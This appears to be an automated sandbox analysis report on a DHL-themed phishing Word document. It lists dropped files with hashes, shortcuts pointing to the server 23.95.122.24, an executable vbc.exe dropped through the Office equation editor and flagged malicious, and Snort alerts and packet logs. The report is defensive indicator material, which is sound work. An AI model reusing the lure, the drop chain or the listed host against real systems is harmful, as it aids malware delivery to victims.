Preview:	..s.d.f.s.f.............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{24814E40-30CA-4646-ACFF-79FC9E14ADCB}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	1024
Entropy (8bit):	0.05390218305374581
Encrypted:	false
SSDEEP:	3:ol3lYdn:4Wn
MD5:	5D4D94EE7E06BBB0AF9584119797B23A
SHA1:	DBB111419C704F116EFA8E72471DD83E86E49677
SHA-256:	4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
SHA-512:	95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{D2384D6F-8836-4311-8D36-3954D2EB570F}.tmp Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	16896
Entropy (8bit):	3.638204091860009
Encrypted:	false
SSDEEP:	384:3rOmx7l0ugn8SIWlnrAc+zxPKbJB9C54wCpj2LxwMhVEwvk4Pw:3rOmx7Z5Un0c+NKpq1Uj5MDE6Pw
MD5:	23F1AC7DB1600320D6CE2850F3D9249B
SHA1:	DDC40E4D9B52AE057E75EA9CB05F4A974C0AB617
SHA-256:	F8DBD12BE3629F58B4AF662A9CC7E21768C3664CDD694792164D7153EF7C0C0B
SHA-512:	193F75B27A31F465BD80868895B4CE2F7AE1827C5DEEE16466DBC73ADB6E47DECC56D53E5440740AE7850FDA1210B6B2BD023ABBFDD30CE850139FE9D98A6842
Malicious:	false
Preview:	&.?.^.:.4.9.9.?.9.%...7.4.&...0.~...;.@.?.!...?.>...~.'.6.:.#..._.<...(.8.).-.?../.:.].@.6.!.4.'.`.`.9...(.$.4.\|.'.%.;.!.!.6.\|.5.?.9...<.@.:.;.+.[.^.~.#.%.'.\|.^.?.....].5.=.%.7.7.^.:._.<.3./.5.?.>.~.:.<./.8.2.;.>...?.>.?.5.<.?.`.`._.\|.~...>.>.?.@.2.'._.%.1.:.?.3.$.?.#.$.7.4.#.+.8.?.@.?.7.!.3.?.;.?.4.?.\|.,.,.?.;././.).#.%.&.....\|.%.?.0.2.>.9.>.\|..._.4..,./.&.].9.?.&.1.-.!.....\|.0.&...@.?...8.8.?.%.%.;.;.(.3.`.8.?.[....+..^.4.&.2.9.\|.%.5..\|.?.1.\|.%.=.1.].^.+.).(.[.,.-...?.0.^.@.).#.:..5.?.^.'._.?.8.[.9.?...?.+.+.-.4.!._.9.,...%.....3.;.~.?.&.$.#.;.%.=.6.+.5.3.~.<...3.0.\|.4.\|.@.7.'./.=.:.-.4.;.>.`.'.:.,.%.`.0.[.?.`.1.?.-.?.?.?.+.=.:.[.?..?.+.6.'.?.'.<.\|.1.?.:.4.&.;.+.>...^.).\|.\|.%.5.8.=.\|.)...4.<...8.4.<./.'.%._.9.3.,.@.[.;.?.7.0.[.?.5.%...;.!.[...?.:.2.~.-.6.-.%.$.?._.?.6.4.[.?.=.7./.?.?.?.<.9...'.2.\|...3.?.[.?.2.?.;.!.7.5...._.?.7.?.3.,.`.'.8.-.6.?.?...6...)...).'.?.1.<.=.....].!.%.9.8.-.1.?.$.7.0.%.?.5.?.\|...6.\|.$.=.!.=.5.!.1.4.$.@.'...%.>.].[.?.1.6.3.?.).5.+...5.6.[.=.%.4.7.9.

C:\Users\user\AppData\Local\Temp\{1C9178E2-878F-41DC-A2DA-5DC2C3F4A84B} Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	137348
Entropy (8bit):	0.05990522701123808
Encrypted:	false
SSDEEP:	12:I3DP84TK7NCfv8p/eR1P84TKbThlQvSQapO0fmuRo6/7yP84TKAxXQuKp:I3cNT/umlQvq7fmXQB
MD5:	4D6E76FC3F17F88B29F9510EAEC618F0
SHA1:	1BC12ACA14DB8234EAF370EBA124F72349978D08
SHA-256:	E9AE520B79C76971B6ACC434C4A99BE471FBBF5EA88EE908CF88F376169B52ED
SHA-512:	85F6836B31B0B246127027AE57572748EDA6DB637B84B1F161EB6D6A5E42085B8326E6215F3FAD131027104804C19E65F461BFE14FBD2B03C6146BA4209D33D2
Malicious:	false
Preview:	......M.eFy...z.]c..X.L.u!..=Q.S,...X.F...Fa.q.............................'lN`x.I..x=b=.1...........(O.EB.\|..ZqIE....................................................................t...t...t...t...........................................................................................................................................................................................................................................................................................................................k..\...C.GD..Y.v...........(O.EB.\|..ZqIE................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\{A39B5EA0-B931-48AE-A182-26B457E12238} Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	137348
Entropy (8bit):	0.05940107324631241
Encrypted:	false
SSDEEP:	12:I3DP0yYvshfv8pvI1P0yYgbLuSQap3ttO/7yP0yYcsnRKp:I3uxAVeqfdx
MD5:	A9E98123C36986634228A6B4DF1F01AD
SHA1:	B8D2423B8D46BF2F219E659BAB7C45CBEFEC53D0
SHA-256:	75C0DA02749FC6DD69B5BDE84F77A64551BB325B39CA96757BABCD7C245028B3
SHA-512:	E9974DEA2FD6BCE445E8B08B7FB6B4754E03060D8949EE2FDA4DD51548B97311DF8B628274C97E1E51B654A65076C65FB00B9032E23A88B857B900FB93C2802E
Malicious:	false
Preview:	......M.eFy...zb...mOTO...0O...S,...X.F...Fa.q................................5.O.../..............j....J....,.......................................................................t...t...t...t................................................................................................................................................................................................................................................................................................................................,nE.r.l..P...........j....J....,...................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.- on 23.95.122.24.url Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	104
Entropy (8bit):	3.5598567524029425
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/ehLOXGa2NCECOCDL8u:HRYFVm/K4GamM
MD5:	9068824ABC5363BBBB1BC24BDC796847
SHA1:	3234BF172D79876FDA384D7326F000847961F145
SHA-256:	7B6042BC97E26DEF346B27CE7BE84A74D59900B0894957709BCB11B9EFB5B17D
SHA-512:	68A5782DE52FA8DDE219F18327A03FAB3E98EC1090837BB6FDC33B441F127D0999FA1A25865BE762863E29C51790996889231126031BEDA94DDFCEFCA47E10F5
Malicious:	false
Preview:	[InternetShortcut]..URL=http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\................................................................................dot.url Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows 95 Internet shortcut text (URL=<http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/.................>), ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	187
Entropy (8bit):	2.6645253060565093
Encrypted:	false
SSDEEP:	3:HRAbABGQYm/ehLOXGa2NCECOCDL8vbpKovn:HRYFVm/K4GamBcov
MD5:	73B2615362C3FE0FB01D66FCE88877F1
SHA1:	F5EB7FC057528410EB83F62B8D6F981A40351BF6
SHA-256:	063F86C8C5E079BE7349F051DFDDB8EF5CD8A8FF8B1BB5C7288F41CC37DB992D
SHA-512:	78472741582D4C84ACE4D8F037ECEF863D9BA99B840287C5DDCB731A0AD71FA7CDC2CDEEDD6DE0B25BB2D61BF07D428F4FA52B958F7E6BC7BE1DD96744054BA7
Malicious:	false
Preview:	[InternetShortcut]..URL=http://23.95.122.24/..-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.-/................................................................................dot..

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\DHL Shipping doc & Shipment tracking details.LNK Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Wed Aug 26 14:08:17 2020, atime=Thu Apr 8 19:17:35 2021, length=10327, window=hide
Category:	dropped
Size (bytes):	2378
Entropy (8bit):	4.601459701041042
Encrypted:	false
SSDEEP:	48:8v/XTFGqOWhkLX4hk8sAQh2v/XTFGqOWhkLX4hk8sAQ/:8v/XJGqOWhkj4hk8vQh2v/XJGqOWhkjB
MD5:	9BC6F39551E02BD9C07CA63F140F125C
SHA1:	5C646BC35575C90D87971033761C66C636002C51
SHA-256:	4A9F4D594C82D025F771F9DBDC3FA1B426ED020A38974E92FFEECDC36FA6D14E
SHA-512:	C31083A8F0CDB124A11A5ED17D97DF5DDBEB5810849373EC11081C49654E7A95AF56325C5E3AA2C4E051328E9C1C519ED01CD4AD89DD31D4D08AB989AF4D0B0B
Malicious:	false
Preview:	L..................F.... .....)..{....)..{...N}6.,..W(...........................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......2.W(...R2. .DHLSHI~1.DOC..........Q.y.Q.y...8.....................D.H.L. .S.h.i.p.p.i.n.g. .d.o.c. .&. .S.h.i.p.m.e.n.t. .t.r.a.c.k.i.n.g. .d.e.t.a.i.l.s...d.o.c.x.......................-...8...[............?J......C:\Users\..#...................\\841675\Users.user\Desktop\DHL Shipping doc & Shipment tracking details.docx.H.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.D.H.L. .S.h.i.p.p.i.n.g. .d.o.c. .&. .S.h.i.p.m.e.n.t. .t.r.a.c.k.i.n.g. .d.e.t.a.i.l.s...d.o.c.x.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-

C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	547
Entropy (8bit):	3.4687573675441232
Encrypted:	false
SSDEEP:	6:Vk9/aNrPKpk9lMVulEcvJVh2VulEcvJnpk9lMVulEcvJL:k/srCYlMVcE6l2VcE6hYlMVcE6l
MD5:	F13178557A2770D28E9168A7D862AC2E
SHA1:	67394C8D3DC0B10C769E5163DAE8AEB60BE361E0
SHA-256:	31D356CA93634748DFC4709B96D9D4480BC0BB0A2169AF7E96F7536406151465
SHA-512:	C6A962BA5CDCCF7464F5C959E52BE8EEFC2DCCF4EE56565D0AF90C4AABF99E7E4411DA714971A5DCF96114DF0266F03674EA00008D219F75E2E74A5E44EB577C
Malicious:	false
Preview:	[dot]..................................................................................dot.url=0....-.-.-.-.-.-.-.-.-.-.-._---------_-------_-------....-.- on 23.95.122.24.url=0..[dot]..................................................................................dot.url=0..[misc]..DHL Shipping doc & Shipment tracking details.LNK=0..DHL Shipping doc & Shipment tracking details.LNK=0..[dot]..................................................................................dot.url=0..[misc]..DHL Shipping doc & Shipment tracking details.LNK=0..

C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	Little-endian UTF-16 Unicode text, with no line terminators
Category:	modified
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:Qn:Qn
MD5:	F3B25701FE362EC84616A93A45CE9998
SHA1:	D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
SHA-256:	B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
SHA-512:	98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
Malicious:	false
Preview:	..

C:\Users\user\Desktop\~$L Shipping doc & Shipment tracking details.docx Download File
Process:	C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	2.431160061181642
Encrypted:	false
SSDEEP:	3:vrJlaCkWtVyokKOg5Gll3GwSKG/f2+1/ln:vdsCkWtW2IlID9l
MD5:	39EB3053A717C25AF84D576F6B2EBDD2
SHA1:	F6157079187E865C1BAADCC2014EF58440D449CA
SHA-256:	CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\Public\vbc.exe Download File
Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	387072
Entropy (8bit):	6.9572597315329805
Encrypted:	false
SSDEEP:	6144:1wpTcyLItYxn3QDQN/rismCZyxB7HZ7g+xsoyEnGYgGI:1wpTd063QDQNSCZQB757txnG5l
MD5:	29E8627D7B80C21FC98C82314F3DF5E2
SHA1:	22817310A3108CED7EC26488E1E2D3D2F8C32018
SHA-256:	98BF20A283219C4CC786234B7D389766FDDBE3B095D13C9109F5406128E83103
SHA-512:	67DA772472FEA7587503C674CC7695D24D6A9B777FD3FB41090058730F65BDF55C7F5CF619EF8A6C2EBB0F03A5FF4DDD81A5846A40D307C711D9B71F72F20525
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 42%
Joe Sandbox View:	Filename: dot.dot, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................................................................................................PE..L......^............................A............@................................6...................................g.......<.... ...,...................P......................................X...@...........................................text...c........................... ..`.data..............................@....fipuh..............................@....wuta...y...........................@....new.....I......J..................@..@.rsrc....,... ......................@..@.reloc.......P.......L..............@..B................................................................................................................................................................................................................................................

Static File Info

General
File type:	Microsoft Word 2007+
Entropy (8bit):	6.903597109209728
TrID:	Word Microsoft Office Open XML Format document (49504/1) 49.01% Word Microsoft Office Open XML Format document (43504/1) 43.07% ZIP compressed archive (8000/1) 7.92%
File name:	DHL Shipping doc & Shipment tracking details.docx
File size:	10327
MD5:	30909a9932c77fb923a96b1b090b4806
SHA1:	2bbe988290a47de63763796db6a39de0e268a5cf
SHA256:	23e650ad3f02ea9f4a402bf5e719d745b7c307c34fd8915045c79d51aab48741
SHA512:	3a42c4e4384bed6fe50d3ac3cc02d65108b315ae899abea355792d2f1063be415d80aa1786bac9053a5b7a5f622491fcc5e53cb8c222c252a430b9af0c034836
SSDEEP:	192:ScIMmtPm0jwluG/bHF/g4CBAfXViwtpV8b3xl:SPXBjwldHZkBoViMQH
File Content Preview:	PK..........!....7f... .......[Content_Types].xml ...(.........................................................................................................................................................................................................

File Icon


Icon Hash:	e4e6a2a2a4b4b4a4

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/08/21-13:17:53.729589	TCP	1142	WEB-MISC /.... access	49168	80	192.168.2.22	23.95.122.24
04/08/21-13:17:58.032868	TCP	1042	WEB-IIS view source via translate header	49169	80	192.168.2.22	23.95.122.24
04/08/21-13:17:58.160534	TCP	1042	WEB-IIS view source via translate header	49169	80	192.168.2.22	23.95.122.24
04/08/21-13:17:59.540071	TCP	1042	WEB-IIS view source via translate header	49169	80	192.168.2.22	23.95.122.24
04/08/21-13:17:59.663271	TCP	1042	WEB-IIS view source via translate header	49169	80	192.168.2.22	23.95.122.24
04/08/21-13:18:00.985110	TCP	1042	WEB-IIS view source via translate header	49169	80	192.168.2.22	23.95.122.24
04/08/21-13:18:01.108862	TCP	1042	WEB-IIS view source via translate header	49169	80	192.168.2.22	23.95.122.24
04/08/21-13:18:01.397148	TCP	1142	WEB-MISC /.... access	49170	80	192.168.2.22	23.95.122.24
04/08/21-13:18:01.656847	TCP	1142	WEB-MISC /.... access	49170	80	192.168.2.22	23.95.122.24
04/08/21-13:18:05.495172	TCP	1042	WEB-IIS view source via translate header	49169	80	192.168.2.22	23.95.122.24
04/08/21-13:18:05.619649	TCP	1042	WEB-IIS view source via translate header	49169	80	192.168.2.22	23.95.122.24
04/08/21-13:18:09.682004	TCP	1042	WEB-IIS view source via translate header	49169	80	192.168.2.22	23.95.122.24
04/08/21-13:18:09.805867	TCP	1042	WEB-IIS view source via translate header	49169	80	192.168.2.22	23.95.122.24
04/08/21-13:19:57.084356	TCP	1042	WEB-IIS view source via translate header	49172	80	192.168.2.22	23.95.122.24
04/08/21-13:19:57.207366	TCP	1042	WEB-IIS view source via translate header	49172	80	192.168.2.22	23.95.122.24
04/08/21-13:20:00.985138	TCP	1042	WEB-IIS view source via translate header	49172	80	192.168.2.22	23.95.122.24
04/08/21-13:20:01.105660	TCP	1042	WEB-IIS view source via translate header	49172	80	192.168.2.22	23.95.122.24
04/08/21-13:20:03.142020	TCP	1042	WEB-IIS view source via translate header	49172	80	192.168.2.22	23.95.122.24
04/08/21-13:20:03.262106	TCP	1042	WEB-IIS view source via translate header	49172	80	192.168.2.22	23.95.122.24

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 8, 2021 13:17:52.831468105 CEST	49167	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:52.949044943 CEST	80	49167	23.95.122.24	192.168.2.22
Apr 8, 2021 13:17:52.949196100 CEST	49167	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:52.950525999 CEST	49167	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:53.077128887 CEST	80	49167	23.95.122.24	192.168.2.22
Apr 8, 2021 13:17:53.077244997 CEST	49167	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:53.611469030 CEST	49168	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:53.728966951 CEST	80	49168	23.95.122.24	192.168.2.22
Apr 8, 2021 13:17:53.729084969 CEST	49168	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:53.729588985 CEST	49168	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:53.847738981 CEST	80	49168	23.95.122.24	192.168.2.22
Apr 8, 2021 13:17:54.056507111 CEST	49168	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:57.909595013 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:58.032418966 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:17:58.032588959 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:58.032867908 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:58.159369946 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:17:58.160533905 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:58.296209097 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:17:58.502851009 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:58.601722002 CEST	80	49167	23.95.122.24	192.168.2.22
Apr 8, 2021 13:17:58.604367971 CEST	49167	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:59.367635965 CEST	80	49168	23.95.122.24	192.168.2.22
Apr 8, 2021 13:17:59.367717981 CEST	49168	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:59.368309975 CEST	49168	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:59.485479116 CEST	80	49168	23.95.122.24	192.168.2.22
Apr 8, 2021 13:17:59.540071011 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:59.662621975 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:17:59.663270950 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:17:59.795531034 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:00.000582933 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:00.985110044 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.108045101 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.108861923 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.238528013 CEST	80	49169	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.273871899 CEST	49167	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.275126934 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.390974045 CEST	80	49167	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.395730019 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.396253109 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.397147894 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.435971975 CEST	49169	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.518948078 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.518975973 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.518990040 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.519002914 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.519387960 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.640276909 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.640302896 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.640325069 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.640367985 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.640465975 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.640479088 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.640495062 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.640522957 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.640558958 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.656847000 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:01.778624058 CEST	80	49170	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:01.778934002 CEST	49170	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.438899040 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.557132959 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.557245970 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.557885885 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.677747011 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.677825928 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.677910089 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.678196907 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.678235054 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.678246975 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.678592920 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.678641081 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.796221972 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.796274900 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.796366930 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.796411037 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.796814919 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.796857119 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.796876907 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.796896935 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.796896935 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.796936989 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.796941042 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.796983004 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.796987057 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.797030926 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.797032118 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.797074080 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.923409939 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.923455954 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.923496008 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.923535109 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.923573017 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.923609972 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.923624992 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.923650980 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.923680067 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.923691034 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.923691034 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.923700094 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.923742056 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.923811913 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.923856020 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.923891068 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.923908949 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.923950911 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.923993111 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.924027920 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.924030066 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.924046993 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.924071074 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.924108982 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.924109936 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.924127102 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.924151897 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.924156904 CEST	80	49171	23.95.122.24	192.168.2.22
Apr 8, 2021 13:18:02.924241066 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:02.925621033 CEST	49171	80	192.168.2.22	23.95.122.24
Apr 8, 2021 13:18:03.041805983 CEST	80	49171	23.95.122.24	192.168.2.22
